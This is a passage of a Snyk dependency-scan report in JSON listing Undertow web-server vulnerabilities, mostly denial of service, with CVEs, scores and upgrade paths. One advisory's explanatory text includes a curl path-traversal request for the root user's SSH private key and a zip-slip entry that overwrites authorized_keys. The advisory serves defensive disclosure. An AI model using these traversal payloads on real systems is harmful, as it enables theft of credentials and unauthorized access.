crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.25.Final, 2.3.6.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/f73e724ab39567e889a6f453aadf520953f3b4ef)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1477)\n- [Undertow Issue](https://issues.redhat.com/browse/UNDERTOW-2137)\n", - "epssDetails": { - "percentile": "0.46729", - "probability": "0.00120", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-1259" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2023-03-12T11:00:33.646508Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-12T10:57:54Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2023-03-12T11:00:33.868032Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.539446Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.25.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-6567186", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.32.Final)", - "[2.3.0.Alpha1,2.3.13.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.32.Final", - "2.3.13.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java%23L46", - "title": "Vulnerable Code" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-04-05T13:32:48.961817Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-05-13T12:05:39.932206Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-05T13:32:48.961817Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Input Validation via the `FormAuthenticationMechanism`. An attacker can exhaust the server's memory, leading to a Denial of Service by sending crafted requests that cause an OutofMemory error.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.32.Final, 2.3.13.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java#L46)\n", - "epssDetails": null, - "identifiers": { - "CVE": [ - "CVE-2023-1973" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-04-05T14:06:11.114809Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-04-04T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-04-05T14:06:11.299727Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-05-13T12:05:39.932206Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.32.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-6669948", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.31.Final)", - "[2.3.0.Alpha1,2.3.12.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.31.Final", - "2.3.12.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242099", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:13.170450Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-05-13T12:00:48.159973Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.170450Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can disrupt service availability by repeatedly sending AJP requests that exceed the configured `max-header-size` attribute in `ajp-listener`, leading to the server closing the TCP connection without returning an AJP response.\r\n\r\n**Note:**\r\n\r\nThis is only exploitable if the `max-header-size` is set to 64 KB or less.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.31.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2242099)\n", - "epssDetails": { - "percentile": "0.21648", - "probability": "0.00053", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-5379" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-04-21T07:43:26.561967Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-12-12T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-04-21T07:43:26.742123Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-05-13T12:00:48.159973Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.31.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7300152", - "title": "Uncontrolled Resource Consumption", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.33.Final)", - "[2.3.0.Final,2.3.14.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.33.Final", - "2.3.14.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2293069", - "title": "Red Hat Bugzilla Bug" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.7, - "cvssVersion": "4.0", - "modificationTime": "2024-06-24T09:03:55.525177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-06-24T09:03:55.525177Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption through the handling of URL-encoded request path information on `ajp-listener`. An attacker can cause the server to process incorrect paths, leading to a disruption of service by sending specially crafted concurrent requests.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2293069)\n", - "epssDetails": { - "percentile": "0.09306", - "probability": "0.00043", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-6162" - ], - "CWE": [ - "CWE-400" - ], - "GHSA": [ - "GHSA-9442-gm4v-r222" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-06-21T06:28:17.382174Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-06-20T15:31:19Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-06-21T07:17:01.928932Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-24T09:03:55.525177Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7300153", - "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Bartek Nowotarski" - ], - "semver": { - "vulnerable": [ - "[,2.2.33.Final)", - "[2.3.0.Final,2.3.14.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.33.Final", - "2.3.14.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://httpd.apache.org/security/vulnerabilities_24.html", - "title": "Apache Advisory" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0", - "title": "Github Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268277", - "title": "RedHat Bugzilla Bug" - }, - { - "url": "https://www.kb.cert.org/vuls/id/421644", - "title": "Security Notes" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-04-04T13:31:53.396581Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-05-28T11:02:47.420228Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-06-07T01:11:20.186304Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.7, - "cvssVersion": "4.0", - "modificationTime": "2024-06-24T09:04:33.419941Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-06-24T09:04:33.419941Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-04T13:31:53.396581Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-05-28T11:02:47.420228Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-06-07T01:11:20.186304Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to insufficient limitations on the amount of `CONTINUATION` frames that can be sent within a single stream. An attacker can use up compute or memory resources to cause a disruption in service by sending packets to vulnerable servers.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [Apache Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)\n- [Github Commit](https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2268277)\n- [Security Notes](https://www.kb.cert.org/vuls/id/421644)\n", - "epssDetails": { - "percentile": "0.75602", - "probability": "0.00459", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-27316" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-06-21T06:34:44.643940Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-04-03T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-06-21T06:34:44.890198Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-24T09:04:33.419941Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7361775", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.33.Final)", - "[2.3.0.Final,2.3.12.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.33.Final", - "2.3.12.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259475", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-05-09T13:34:57.715909Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:52:49.711513Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-06-24T08:51:30.646140Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-05-09T13:34:57.715909Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:49.711513Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Directory Traversal due to improper input validation of the HTTP request. An attacker can access privileged or restricted files and directories by appending a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2259475)\n", - "epssDetails": { - "percentile": "0.20823", - "probability": "0.00052", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-1459" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-06-24T08:51:30.470325Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-01-18T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-06-24T08:51:30.645852Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-24T08:51:30.646140Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7433720", - "title": "Uncontrolled Recursion", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,2.3.8.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.8.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292211", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://access.redhat.com/errata/RHSA-2024:4392", - "title": "Red Hat Security Advisory" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.7, - "cvssVersion": "4.0", - "modificationTime": "2024-07-17T10:19:41.285562Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-07-17T10:19:41.285562Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion in chunked response handling. An attacker can cause a client to wait indefinitely by sending excessive data without a `0\\r\\n` termination sequence in chunked responses, thereby disrupting service to the server. \r\n\r\n**Note:** This is only exploitable when using `NewSessionTicket` functionality in TLS 1.3 on Java 17.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.3.8.Final or higher.\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2292211)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n", - "epssDetails": { - "percentile": "0.16001", - "probability": "0.00045", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-5971" - ], - "CWE": [ - "CWE-674" - ], - "GHSA": [ - "GHSA-xpp6-8r3j-ww43" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-07-10T07:31:06.494967Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-07-08T21:31:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-07-10T14:09:02.139513Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-17T10:19:41.285562Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.3.8.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7433721", - "title": "Memory Leak", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - 